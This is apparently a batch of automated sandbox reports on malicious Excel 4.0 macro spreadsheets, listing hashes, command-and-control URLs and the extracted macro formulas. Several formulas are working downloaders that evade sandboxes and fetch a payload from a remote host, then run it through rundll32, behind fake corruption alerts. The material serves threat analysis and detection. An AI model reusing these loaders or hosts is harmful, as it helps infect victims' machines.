{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b91ddba578882af28946c3c99f5ad8a99563149f83fc716f3754b06d660f6b5"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b91ddba578882af28946c3c99f5ad8a99563149f83fc716f3754b06d660f6b5","filesize":112640,"md5":"a823647e5487935b10106179826cba6c","sha1":"2f260edcbbcad6a0a30ac8ef175af574df6b180a","sha256":"6b91ddba578882af28946c3c99f5ad8a99563149f83fc716f3754b06d660f6b5","sha512":"e2baa7261fa07c2dfbb601976e98ed8be030c54a8405f9eead1fab9f8bd5ae82f302cd8c49b9aa22f65233a412a7306e2986f36f160dbe0e52ecc2ac3bbabac1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b91ddba578882af28946c3c99f5ad8a99563149f83fc716f3754b06d660f6b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6b954630ed7fb7343e9f8106f018de666245b26ee03a109f9ac781afa4de1ee1"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6b954630ed7fb7343e9f8106f018de666245b26ee03a109f9ac781afa4de1ee1","filesize":185344,"md5":"f1ead68f3730569530b766d217da4af5","sha1":"ddeb77e97daa5a0816854fcc7b309d8f21babff0","sha256":"6b954630ed7fb7343e9f8106f018de666245b26ee03a109f9ac781afa4de1ee1","sha512":"9f8e14e4ad11f40e71a357f3a6cef378745641258e2f64bab782ea18da55618ef385f6d2d20a5d2a789c3fa607e6cfe53220f9d2da5853c6f080d852700ef657","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6b954630ed7fb7343e9f8106f018de666245b26ee03a109f9ac781afa4de1ee1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6bc804c75c0d8fa4b31553266bdc29b4c40e5bffbebaf1bfa53ed47c74181588"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6bc804c75c0d8fa4b31553266bdc29b4c40e5bffbebaf1bfa53ed47c74181588","filesize":171008,"md5":"8d2bc47fbe3e8534735961ebb977e033","sha1":"8ca0d0c4f3dc847308d41529c7e0ff138ea90cad","sha256":"6bc804c75c0d8fa4b31553266bdc29b4c40e5bffbebaf1bfa53ed47c74181588","sha512":"9a862a53851574ea345a8e57d9142251677ac2d37ed95d5b1bf14c5bd87e026ba761737b56765b2f598afdbe403d8b2bc2bf4b5fe2ae57b484af62e5ba9db109","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6bc804c75c0d8fa4b31553266bdc29b4c40e5bffbebaf1bfa53ed47c74181588.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IflqobiAVF\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6bccb066ef0b6fd3f9be3900ba62d57b7d416d498411595703c780b06cfbdab3"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6bccb066ef0b6fd3f9be3900ba62d57b7d416d498411595703c780b06cfbdab3","filesize":185344,"md5":"7152cb278ea22318ea10d34d27ad0376","sha1":"937ab8a4e29f3c900854241dfdc2ef6571e46a4c","sha256":"6bccb066ef0b6fd3f9be3900ba62d57b7d416d498411595703c780b06cfbdab3","sha512":"37cd804b44bc4f76c6e5b4c1138e0d4aa099f2bba3372f4539513a5e9f8b0eef416e48cc81ca185d117f484f2b8ff167b2f850229abadaf8f2f7034145e7d19e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6bccb066ef0b6fd3f9be3900ba62d57b7d416d498411595703c780b06cfbdab3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6be7ce5f8bf0d16480c8fcee2e75eace5c1a9da53dd5cedeaeebe4f49559db28"},"analysis":{"reported":"2020-04-09T16:16:53Z","score":10},"files":[{"filename":"6be7ce5f8bf0d16480c8fcee2e75eace5c1a9da53dd5cedeaeebe4f49559db28","filesize":170496,"md5":"d465cf272274142b2da261f7a78c3215","sha1":"cd9cb37f8e12ba226409d9cc73c30614384126bd","sha256":"6be7ce5f8bf0d16480c8fcee2e75eace5c1a9da53dd5cedeaeebe4f49559db28","sha512":"f618d965648e4f0bd67ea3658b334e06d16fc75303dee150df586877d5acfca52aad05780d520d3df35bd9334a9ea78772b0c6ac3d065ff860b0df884f8e3514","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6be7ce5f8bf0d16480c8fcee2e75eace5c1a9da53dd5cedeaeebe4f49559db28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vMrSxxiMzh\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6bfa5ae1067e5cba2c2d0da74243d8d31855cea918c0e536c93625b50fb351f8"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6bfa5ae1067e5cba2c2d0da74243d8d31855cea918c0e536c93625b50fb351f8","filesize":167936,"md5":"d6328366a389ec3752c29c31a37f9505","sha1":"06c3f31800357e6ad512bd7f1bdff5f7e5aa3e78","sha256":"6bfa5ae1067e5cba2c2d0da74243d8d31855cea918c0e536c93625b50fb351f8","sha512":"364355c21d5e431fa5eb651a8d4ea1b08f1f2cdcd1731f2c99ba0ddafee411c12fd641e795dfd6af90d47f3811453b88ddeeba1c961e5773d255831c23d323f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6bfa5ae1067e5cba2c2d0da74243d8d31855cea918c0e536c93625b50fb351f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ntofFabvFH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c0475a221793465973d248d3e62f1c790c1979ad16105d7667ad2c1ed285e60"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c0475a221793465973d248d3e62f1c790c1979ad16105d7667ad2c1ed285e60","filesize":144384,"md5":"77056e69649fc2ced2962624dc1b196d","sha1":"ef104474fac01733b70d01cacda73ef40ae51bba","sha256":"6c0475a221793465973d248d3e62f1c790c1979ad16105d7667ad2c1ed285e60","sha512":"7218ef8ec12f4ea39fbba9b1f4062942ac89efd1c169f9db95ec0b4f581bde2973bdac292187b006837b2c61a8abb47cb21a05089775cdf7134fc8d9d6dcf0fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c0475a221793465973d248d3e62f1c790c1979ad16105d7667ad2c1ed285e60.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"WubnsH9wCu\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c1b4029ae7323c239681668a21376b3a187152e53ce0ee0864b3455d42035b3"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c1b4029ae7323c239681668a21376b3a187152e53ce0ee0864b3455d42035b3","filesize":185344,"md5":"b7a6c7bf34460023f01b6659529aa8f1","sha1":"f65b7030ae42a8cd3b8249f7b02c9cf56d091188","sha256":"6c1b4029ae7323c239681668a21376b3a187152e53ce0ee0864b3455d42035b3","sha512":"31d7278cc04a17f2bf3508f12fa8c15d0c1d39f4bfd0b82b43e906342d736247fce49d6dcede514d50bbb20431eab9d66878c76a75620545421284bc2fb1db5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c1b4029ae7323c239681668a21376b3a187152e53ce0ee0864b3455d42035b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c1bba12d0aa52b3cb797a2c601125b551e4209d17d3ab6a3340ecfeed3a2b93"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c1bba12d0aa52b3cb797a2c601125b551e4209d17d3ab6a3340ecfeed3a2b93","filesize":116224,"md5":"d30a579e37207ce038ba6cdbd8ffcda6","sha1":"ad7b9d127c58f8f4c976440d46aeaab8d8ed2d8a","sha256":"6c1bba12d0aa52b3cb797a2c601125b551e4209d17d3ab6a3340ecfeed3a2b93","sha512":"a685edd3d7542ad5ea0457b59db0087e38ecd3f58b51d0f2f1f90f146975b071550addc1c669985d49a7b976be5cff598a08790a30236f52d88dd91660986f08","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c1bba12d0aa52b3cb797a2c601125b551e4209d17d3ab6a3340ecfeed3a2b93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KniH1TKhhe\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c2885d64711023e314e03a5ee39ce030ec443a12b1749aeb2532bf70e4ef117"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c2885d64711023e314e03a5ee39ce030ec443a12b1749aeb2532bf70e4ef117","filesize":185344,"md5":"541fe23f3e36219644be5fe1fcd524e3","sha1":"182349cda652e0e4b61a85354802880bfe502614","sha256":"6c2885d64711023e314e03a5ee39ce030ec443a12b1749aeb2532bf70e4ef117","sha512":"450453ca2ecf9d5f12a24d64651b2deb06b42a9bed17a9c0261a91ba49950fafa4ef23ac695cfcd221890c8ab6422383f21bb16842f9d013bb02b29b793a5a36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c2885d64711023e314e03a5ee39ce030ec443a12b1749aeb2532bf70e4ef117.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c2c33951bd28fc1421d855bbf8690747458071e16266029d70a377b4bb17a17"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c2c33951bd28fc1421d855bbf8690747458071e16266029d70a377b4bb17a17","filesize":168960,"md5":"1ea7636ac89b5c88d91f4c0893b80427","sha1":"3b2ed54c349cb9334d6407255f4bca3c4160dc88","sha256":"6c2c33951bd28fc1421d855bbf8690747458071e16266029d70a377b4bb17a17","sha512":"3ec8679651c313dd435ac96b7fe1f30a9a993a3d8c158c73c3f377cea783c933cb11da56dc12d9ba0e463239db5af677f9ed245cf2d4520f62230cfe2db6b549","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c2c33951bd28fc1421d855bbf8690747458071e16266029d70a377b4bb17a17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"z2VZ08lDnY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c308dabe1018589934d9ee80f8e77e2170f1f618d544b46956e01592c2cd705"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c308dabe1018589934d9ee80f8e77e2170f1f618d544b46956e01592c2cd705","filesize":152576,"md5":"578bf4f488862adfae886ad765190a96","sha1":"a94c68c4a0f9a06de8b4b1ebe72f1404195a8558","sha256":"6c308dabe1018589934d9ee80f8e77e2170f1f618d544b46956e01592c2cd705","sha512":"530cd6f5a4572cefb8e9e779c0ba444786fa0df67d32aa79d44814c6a32a8c90f5b4bebd6e3952f3e7a7a78ce64cdecf6c5146cf188469182f963e1fe3888cd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c308dabe1018589934d9ee80f8e77e2170f1f618d544b46956e01592c2cd705.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EW6PmOiKiB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c3358ce2ecc3aa60b319a60223559d374848310790023c5e7ae29c413ebd590"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c3358ce2ecc3aa60b319a60223559d374848310790023c5e7ae29c413ebd590","filesize":209408,"md5":"505cbdc83fe70ff4bc8bec04540160e1","sha1":"337f9b676e49464b21b054e3d3c39def8b05363a","sha256":"6c3358ce2ecc3aa60b319a60223559d374848310790023c5e7ae29c413ebd590","sha512":"04a8fe9b2614417ec1115ab63250a2bbc95f4561c19e372b63c64b716efe152fdec2d53bc3a8c8a55b4895ddb4aeacc7c18b0cf271d83b8c95a9576a4e591d39","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c3358ce2ecc3aa60b319a60223559d374848310790023c5e7ae29c413ebd590.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7sMhQKNhU7\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c43be2152675e34c416c6f22118e8716c7a4ccbfe409257813dd6cbf44afea4"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c43be2152675e34c416c6f22118e8716c7a4ccbfe409257813dd6cbf44afea4","filesize":185344,"md5":"5f18530e6f8ae23c934de5e5f8b0d705","sha1":"7b5baae8ecc805585c02a1a14b138a82e19d3841","sha256":"6c43be2152675e34c416c6f22118e8716c7a4ccbfe409257813dd6cbf44afea4","sha512":"af4827558061ad30ebfb0b76e71bfd1db6acb63d842269644b243960141abc6dd195426c023a6d9d8b753ca907c70ea204ca19d344254af81dccf07dfdf520a9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c43be2152675e34c416c6f22118e8716c7a4ccbfe409257813dd6cbf44afea4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c59ea9e903b66a4e267cb1b6d94ee109d1e70add9a15f86864380c6d8bcce58"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c59ea9e903b66a4e267cb1b6d94ee109d1e70add9a15f86864380c6d8bcce58","filesize":168960,"md5":"03f678678cc3a8ef1632e2c02d417360","sha1":"725c9f1c4422a2f21936e21b5cee6407ed6b4093","sha256":"6c59ea9e903b66a4e267cb1b6d94ee109d1e70add9a15f86864380c6d8bcce58","sha512":"bec5256a4efd619f99b14cefe2a6adac47e1707a25e6ad58506880a4295e77ff3c1edc5a3a851cb1972ced9676bef73ceaf84dee62cf40615eb677ccbfe3226b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c59ea9e903b66a4e267cb1b6d94ee109d1e70add9a15f86864380c6d8bcce58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2GGAA8tnSK\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c72d443bd08e9b50fe5e5e4c228ce520f50b0e2a282ff3c1dce4a7dc2a184ac"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c72d443bd08e9b50fe5e5e4c228ce520f50b0e2a282ff3c1dce4a7dc2a184ac","filesize":167936,"md5":"c891508d01d3b1d078c03ab8d28a4e04","sha1":"9aa7e9d638e182d0a83c4a532134a96d2c497dfe","sha256":"6c72d443bd08e9b50fe5e5e4c228ce520f50b0e2a282ff3c1dce4a7dc2a184ac","sha512":"cf768500a3dacd15f2ea4b7b806947c5046b3b2a9772c207fc54fe890140d008c6bf7266b61fe7cc73669b1452e28cf76cece1babfebedf1e6b75120a57ff5bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c72d443bd08e9b50fe5e5e4c228ce520f50b0e2a282ff3c1dce4a7dc2a184ac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lQw82bbSnc\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6c80461e4ce34f74795159d4d923b27b8d0f7a5bc4b674868b63217c6757c102"},"analysis":{"reported":"2020-04-09T16:16:54Z","score":10},"files":[{"filename":"6c80461e4ce34f74795159d4d923b27b8d0f7a5bc4b674868b63217c6757c102","filesize":113664,"md5":"be0cae87731a5ce72133ddc453b064bf","sha1":"4791e3bef27ef77c787fed2605f9ec38fc775dfe","sha256":"6c80461e4ce34f74795159d4d923b27b8d0f7a5bc4b674868b63217c6757c102","sha512":"db7b359ec8788ae1a61367ae79c9d617f61d72c6e0e427f44346f8574f7a69ff5a971430be1bdc72e39484287f24be2aae38f0110c3001ac1ac3895b46cb2626","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6c80461e4ce34f74795159d4d923b27b8d0f7a5bc4b674868b63217c6757c102.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9MdIUe2fsU\",TRUE)\nGOTO(R$1C$10)"}}}]}
